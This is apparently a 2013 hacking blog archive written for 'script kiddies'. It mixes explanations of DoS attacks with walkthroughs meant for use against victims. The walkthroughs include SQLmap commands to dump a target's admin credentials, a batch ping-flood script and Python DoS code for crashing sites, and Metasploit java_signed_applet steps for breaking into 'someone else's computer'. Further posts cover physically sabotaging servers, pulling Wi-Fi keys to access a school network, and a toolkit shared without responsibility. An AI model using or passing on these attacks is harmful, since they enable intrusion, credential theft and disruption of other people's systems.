Showing posts from 2013


Hey there just wishing you guys a happy new year

Anonymous tool kit for srcipt kiddies

How to jailbreak any apple device

Today I am going to show you how you could jailbreak any apple device. so the first step would be having a apple device and downloading this software called redsn0w from here:
after you download it just run it and plug in your device with the charger cable and power it off and then click the button that says jailbreak and follow the instructions on the program. after you have finished that you should wait for your device to reboot and for those who don't know it can mess up or break your iPhone but it can also improve your experience of the device but if you update your firmware then the jailbreak will be undone.
hope this was useful enjoy.

How to get kali Linux

Today I am going to teach you how to install the OS Kali Linux on a USB. The materials you need are a USB a computer and Internet connection.
1. The first step is downloading the OS you can do this by going here: . Next you should find out what bit your computer is 32 or 64 bit you can do this by going to computer and clicking system properties. Then you should download the latest version of backtrack that is your bit type.  2. After it downloads you should get a program called UNetbootin which can be downloaded from here:, once that is downloaded you should run UNetbootin and select the OS you downloaded, you should have a blank USB to install the OS on so plug it in and let the program install the OS.
Kali is used for hacking it is completely legal to use as long as it is being used ethically I would appreciate it if you would request some tutorials enjoy

How to change your MAC adress

Today I am going to show you one way to hide your MAC adress using a program called TMAC. so you just download it and install it and press the button that says chang mac adress once it is open.
download here:;language&cval=NONE;en&

SQL Injection with SQLmap

Today my tutorial is on hacking a SQL database using SQLmap. so the first step would be to write this cd/pentest/web/scanners/sqlmap then hit enter. Then write this except put your targets name in the targets name section. type this to find the databases python -u (targets name here) --dbs then hit enter
then you should select a database then you can type this python - u (targets address) -D (the table you selected) --tables then hit enter.
then you will see the tables displayed if you have done this correctly.
now find the column by typing this: python - u (targets address) -D (the table you selected) -T --columns
this is the last step type this: python - u (targets address) -D (the table you selected) -C (column name) --dump then hit enter
then it will ask you yes or no  and you put y and enter then you just wait and it will have the Admin ID name and the password encrypted in md5 hash were you have to decrypt it.
hope this was useful please v…

Top Hacking Operating Systems

Hey. Looks like you are interested in hacking. You might go a head and search for 100 of tools available out there download them and then go in trouble installing them and making work with you machine ( Like I did with my mac) or you install a costume Linux distros on your machine.
So what linux distros do we have out there.
So Lets take a look.

Backtrack is my first Linux Distro I used for hacking. it  is kind of outdated but there are lot of ways to fix it and it is ready to role. Plus there are a lot of tutorials and books for it.
2)Kali Linux

"Rebirth Of Backtrack" a really nice distros if you are coming from Backtrack it is  kind of hard to get around but you will get use to that. Doesn't come with KDE so you need to install it manually. Works really nice on my raspberry Pi.
3) BackBox

Looks really cool. easy to dual boot. Based on Ubuntu . If you installed it I suggest looking at it Anonymous browsing menu works really nice.
4)BHS Dark Mint (1.5 Is out…

Crashing sites tutorial

Today I am doing something for you script kiddies this is a batch program run it and put in you victims IP adress and you have to save the file as a random name and then .bat and you have to put this code in notepad on windows. After it is save you have to run it as a admin and wait for the victim to crash. here is the code:
cd \
title Educational DOS script!
color a
echo off
echo starting Program
ping -n (targets IP) >null
echo Make sure you changed (Target) to the ip your testing on...
ping -n 3 localhost >null
Ping -t -l 65000 (targets IP)
goto a

Enjoy script kiddies.

Kali LInux better or worse then backtrack for hacking?


How to physically break a network

Today I am doing a tutorial on how you could mess up a network if you can get near the servers. So the first thing you would do is go up to the server and first of all unplug Ethernet cables running from one server to the other. Once that is done switch around the ports the cables are plugged into this will make the network unable to assign a computers IP. Then you would reboot both of the servers by holding down the power button. Now the network will not function and the person fixing it will take a long time because they have to find the original ports it was plugged into which means he or she will have to practically rebuild the server. hope this was useful I hope you use this for educational uses, and enjoy.

hack acess of your school network

Today I am talking WirelessKeyView which recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer by the 'Wireless Zero Configuration' service of Windows XP and by the 'WLAN AutoConfig' service of Windows Vista. It allows you to easily save all keys to text/html/xml file, or copy a single key to the clipboard.

Using WirelessKeyView WirelessKeyView does not need to be installed just run it an your operating system has to be windows XP or greater. After you run it, the main window should display all WEP/WPA keys stored in your computer by Windows 'Wireless Zero Configuration' service. For WEP keys, the key is also displayed in Ascii form. Be aware that this utility can only reveal the network keys stored by Windows operating system. It cannot recover network keys stored by any other third-party software. Notice about WPA-PSK Keys When you type a WPA-PSK key in Windows XP, the characters that you type are automatically converted into a …

How to hack into someone else's computer using backtrack

Today I am going to show you how you can hack in to another person's computer using backtracks metasploit. So to start out you would boot up backtrack and then you would go and boot up metasploit console by typing msfconsole inside a terminal window.

After you have typed that in hit enter and you should wait for about a minute and then it should pop up and then you would type this:msf > use exploit/multi/browser/java_signed_applet
msf exploit(java_signed_applet) > show targets ...targets...msf exploit(java_signed_applet) > set TARGET <target-id> msf exploit(java_signed_applet) > show options and set options...msf exploit(java_signed_applet) >
after you have selected your victim and your options you should be able to exploit it from there. I hope this was useful enjoy. exploit

how to setup and use a proxys

Today I am going to talk about proxies and how to set them up and how to use them. you can download it from here: I chose this software because it is free and still very useful it also doesn't contain any ad ware. The first thing you should do is download and install it then you would install it the express way and do not customize it. after all that is done run it make a account and login, after that you would select hide my IP and it will tell you if you are hidden or not. Hope this was useful and merry Christmas.

DOS attack explained

Hey today I am explaining how a DOS (Denial of Servie) attack works and what it is. So a DOS service attack is a type of attack toward usually a website were multiple computers send packets of data to a site and they eventually flood it, causing the site to no longer operate for a while. Most script kiddies use this attack and think they can individually take a site down which is near impossible. I would mention now that allot of real hackers use this attack to but are actually able to excute it properly and not use it as a toy.
hope this was useful and enjoy.

Script kiddie tool kit

Hey there today I am going to give out a toolkit for script kiddies but I don't take responsibility for what you do with this software, Here is the download link:
I would like to apologize for the wait on new articles I had a power outage and was without power for about a week, this is a torrent file so if you don't have a torrent client you will not be able to download this file here is the link of how to get a client and set it up. Here is the other link:
hope this was useful please support and follow

Basic Dos attack script in Python

import time import socket import os import sys import string #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~# def restart_program(): python = sys.executable os.execl(python, python, * sys.argv) curdir = os.getcwd() #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~# print ("DDoS mode loaded") host=raw_input( "Site you want to DDoS:" ) port=input( "Port you want to attack:" ) message=raw_input( "Input the message you want to send:" ) conn=input( "How many connections you want to make:" ) ip = socket.gethostbyname( host ) print ("[" + ip + "]") print ( "[Ip is locked]" ) print ( "[Attacking " + host + "]" ) print ("+----------------------------+") def dos(): #pid = os.fork() ddos = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: ddos.connect((host, 80)) ddos.send( message ) …

Install Hacking tools on mac

Hey guys so lets get started.
1. Install HomeBrew ( Macports sucks at this it broke my donwload 10 times )
ruby -e "$(curl -fsSL" ( it will ask you to install Xcode tools just follow the instructions if needed go to app store and get Xcode it's free )
2.install RVM to downgrade ruby (looks like metasploit won't work with ruby 2.x.x so you need to go to ruby 1.9.3
\curl -sSL | bash
3. install all the requirements for rvm  ( it will take some time so wait )
rvm install requirements
4. install ruby 1.9.3
rvm install ruby 1.9.3
5. install postgres
1) update brew
brew update
brew doctor

2)install it
brew install postgresql
initdb /usr/local/var/postgres -E utf8 ( if this code fails it is ok to ignore )
gem install lunchy this will install lunchy it is a really nice way to manage postgres
mkdir -p ~/Library/LaunchAgents
cp /usr/local/Cellar/postgresql/YOURVERSIONNUMBER/homebrew.mxcl.postgresql.plis…

"sounds like these white hats arent as white as they say they are"

So many of you know that a few days ago I started to investigate Dark Mint and all this crazy thing that happened with D4RkNiK0l4s. So after a long time of researching and testing I proofed that THS people are liers
quote from Black Hat Sec's form (which is up and running now)
So lets go step by step and see what I found.  What are they blaming him for ?  THS is really messy to come up with one thing to blame D4Rk for  they are saying that he backdoored his own os and then I ask for a proof they link to a website where they say that he stole his page's passwords that when I ask for a proof they say "We shouted it down" well or I am an complete idiot and can't see the proof or there is no proof at all. it's like saying "I kicked hime because he attacked me and I can proof it because I kicked him" doesn't make sense, does it. So I also monitored Dark  mint for 2days there were no connection ( I was searching for something like beacons ).  TopHatS…

crashing sites with rdos

We will be talking about rdos attack First off all we will have to know about DDOS Attack. DDOS, short for Distributed Denial of Service which is a type of DOS attack where multiple compromised systems which are usually infected with a Trojans which are used to target a single system causing a Denial of Service (DoS) attack. Victims of a DDoS attack consist of both the end targeted system and all systems maliciously used and controlled by the hacker in the distributed attack. 
In a DDoS attack, the incoming traffic flooding the victim originates from many different sources  potentially hundreds of thousands or more. This effectively makes it impossible to stop the attack simply by blocking a single IP address; plus, it is very difficult to distinguish legitimate user traffic from attack traffic when spread across so many points of origin.

Today I will be showing how to use RDos to attack small sites. You are probably wondering how it works, It works a lot like a syn-flood, which spins…

The difference between hacking and destroying

Hacking has gained a reputation for the destruction of things when in a actual fact it is the idea of obtaining a higher knowledge. I know that sound like illuminati propaganda but here is an example. Some one does a SQL injection attack on a site to gain knowledge and someone who does a denial of service attack destroys a site, nothing was gained the only thing that occurred was the destruction of a site. In my personal opinion I find no reason to destroy things but it depends on what if you want to learn or destroy and in that tone please send me a email if there is something you want to learn destruction wise or educationally I don't encourage the act of destruction but I feel it better to teach things to others no matter what they can do with it.

Investigating Dark Mint

A few days ago (10) some one posted on saying that D4RkNiK0l4s backdoored his own OS ( Dark Mint).

I searched D4RkNiK0l4s's website and find out that TopHatSec was trying to make Dark Mint paid and took out all the THS scripts. Some other dude sad that they requested all the personal info about BHS users (I don't know for sure).
So then I looked up some things on TopHatSec's Website and find out that they are saying that D4RkNiK0l4s was trying to  stole his websites passwords and he is creating a bot net from all the users. I do personally trust D4RkNiK0l4s so I am going to proof that TopHatSec is a lier once and for all
If you know anything or want to see your article published please contact

Here are some link page:  D4RkNiK0l4s's new form:  Why D4RkNiK0l4s left TopHatSec :…

Java exploit talk

Today I am just going to do a talk but not a tutorial on a java exploit. The specific exploit I am talking about is a java exploit that works by raising it's own privilege and then it disconnects the connection between the two servers. when this happens the IP address's align incorrectly because the server tries to immediately reconnect but it aligns them Wrong causing the entire network to fail which means you would have to basically unplug the entire network and start from scratch. When I saw this attack in action it took around two months to fix so this type of attack can be extremely harmful to a network I cannot give you a program for this because there isn't one and if you would like to do something at this scale educationally you would need to create your own exploit you can write exploits in multiple programming languages including java as I have just talked about but I would be careful were and how you run these exploits to be sure that you are not doing anything …

Metasploit video from infinity exist's

In this Underground Video, Copy explains how to use Metasploit’s Autopwn. The Metasploit Framework is a tool for developing and executing exploit code against a remote target machine. Autopwn is a tool in Metasploit Framework version 3 that automates the exploitation process. Copy demonstrates how to use Autopwn in both Backtrack 2 and Backtrack 3.This video maybe old but is still relevant.

PIng of death

Today I am talking about the Ping of Death because a lot of people just starting out in hacking have heard of it, but don’t know exactly want it is. Also, they still believe it is a useful attack today. You can go on Youtube and watch tons of videos of kids making batch files that send pings with random payload sizes; however, this is horribly incorrect. The Ping of Death basically crashes a computer by sending a ping (aka ICMP ECHO request) with a packet greater than 65,535 bytes, and the reason this causes problems is because an IP packets can only be up to 65,535 bytes long. Packets that are bigger than the maximum size are fragmented into smaller packets, which are then reassembled by the receiver. Typically, machines don’t process the packet until all fragments have been received. When the machine tries to reassemble the packet it causes an overflow in internal variables, which can lead to a system crash. Some vulnerable operating systems are Windows 95, Windows NT, Windows 3.11…